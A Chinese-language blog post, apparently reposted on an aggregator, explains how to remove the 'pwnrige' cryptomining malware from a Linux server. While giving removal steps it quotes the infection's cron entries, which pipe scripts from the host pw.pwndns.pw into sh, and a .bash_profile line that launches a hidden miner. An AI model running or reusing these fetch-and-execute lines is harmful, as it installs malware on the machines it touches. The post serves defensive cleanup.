美文网首页
pwnrige挖矿病毒

pwnrige挖矿病毒

作者: 李哈哈_2c85 | 来源:发表于2023-09-27 11:41 被阅读0次

pwnrige挖矿病毒:
所有病毒文件删除提示没权限时,运行 chattr -ia 文件名

1、开机启动文件
/etc/systemd/system
/etc/init.d/

    pwnrige.service  lntpdate.service enntpdate.service 

    systemctl daemon-reload
    systemctl status pwnrig.service
    systemctl disable lntpdate.service && systemctl stop lntpdate.service
    systemctl disable enntpdate.service && systemctl stop enntpdate.service
    systemctl disable pwnrige.service && systemctl stop pwnrige.service
    systemctl disable pwnrige.service && systemctl stop pwnrig.service

chattr -ia /etc/init.d/*
rm -rf /etc/init.d/ntpdate 
rm -rf /etc/init.d/pwnrig

2、计划任务 --观察下/var/log/cron日志查看下载跑什么任务!

crontab -e  #删除相关计划任务
cd /var/spool/cron   
[root@localhost cron]# cat x
* * * * * /var/tmp/.systemd/.systemd
* * * * * /var/tmp/.update/.update
*/10 * * * * curl -fsSL http://pw.pwndns.pw/update.sh | sh -s uc
@reboot curl -fsSL http://pw.pwndns.pw/reboot.sh | sh
[root@localhost cron]# cat root 
* * * * * /var/tmp/.systemd/.systemd
*/5 * * * * curl -fsSL http://pw.pwndns.pw/root.sh | sh

hosts文件修改:127.0.0.1 pw.pwndns.pw
计划任务文件删除:
rm -rf /var/spool/cron/x
rm -rf /var/spool/cron/root
rm -rf /var/tmp/.systemd
rm -rf /var/tmp/.update

3、用户文件相关

userdel -R x

    [root@localhost ~]# cat .bash_profile 
    # .bash_profile

    # Get the aliases and functions
    if [ -f ~/.bashrc ]; then
        . ~/.bashrc
    fi
    # User specific environment and startup programs
    PATH=$PATH:$HOME/bin

    export PATH
    cp -f -r -- /bin/bprofr /bin/-bash 2>/dev/null && /bin/-bash -c  -p 80 -p 3333 -p 443 -tls  -d -dp 3333 -dp 443 -tls >/dev/null 2>&1 && rm -rf -- /bin/-bash 2>/dev/null

chattr -ia .bash_profile
sed -i s/^cp/#cp/g .bash_profile

4、/bin和/sbin 下的四个程序文件删除--可以在sbin和bin目录中使用ll -lrt看看近期什么程序安装进去判断大概中毒时间
bprofr crondr initdr sysdr

chattr -ia /sbin/*
chattr -ia /bin/*
rm -rf /sbin/bprofr /sbin/crondr /sbin/initdr /sbin/sysdr
rm -rf /bin/bprofr /bin/crondr /bin/initdr /bin/sysdr

5、最后再搂一遍

chattr -ia `find / -name "*pwnrig*"`
rm -rf  `find / -name "*pwnrig*"`

参考连接:
https://blog.csdn.net/huangzyi/article/details/116919742
http://www.manongjc.com/detail/29-fspszblmttguygt.html

相关文章

  • 挖矿病毒

    自从比特币火起来以后,运维和安全同学就经常受到挖矿病毒的骚扰,如果有人说机器cpu被莫名其妙的程序占用百分之八十以...

  • 挖矿病毒xmrig

    今天同事过来找到我说服务器被人挖矿了。。然后发截图给我看

  • 记一次解决挖矿病毒的过程(sysupdate、networkse

    对于挖矿病毒,我们如何发现它呢?其实有个很显然的问题,挖矿病毒会超级占用cpu,当你发现你的服务器变的很卡的时候,...

  • 挖矿病毒(基于SMB漏洞传播)分析

    本文旨在对SMB挖矿病毒传播机制做分析。 网络中的计算机出现由SMB漏洞传播的挖矿病毒,基于目前黑客技术上流行的非...

  • 2019-08-31

    第一次 亲历挖矿病毒 感染服务器

  • 门罗币挖矿病毒

    查看所有外部连接 正在连接的,已经关闭连接的 如果发现有连接异常IP找到相关进程 查询进程 通过netstat找到...

  • 清除挖矿病毒kdevtmpfsi

    首先确保scrapyd没有对外网0.0.0.0开放可以检查阿里云安全组还有scrapyd包所在目录的配置文件一般在...

  • 禁锢linux挖矿病毒

  • kdevtmpfsi挖矿病毒处理

    收到服务器监控发送的警报,CPU使用率达到100%,以下记录问题发现与处理方法 使用top命令查看cpu进程,发现...

  • 解决挖矿病毒的经历

    线上一台服务器,CPU高达90%以上,经过top 分析出进程kdevtmpfsikill -9 杀死进程无果,很快...

网友评论

      本文标题:pwnrige挖矿病毒

      本文链接:https://www.haomeiwen.com/subject/halkbdtx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|pwnrige挖矿病毒|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!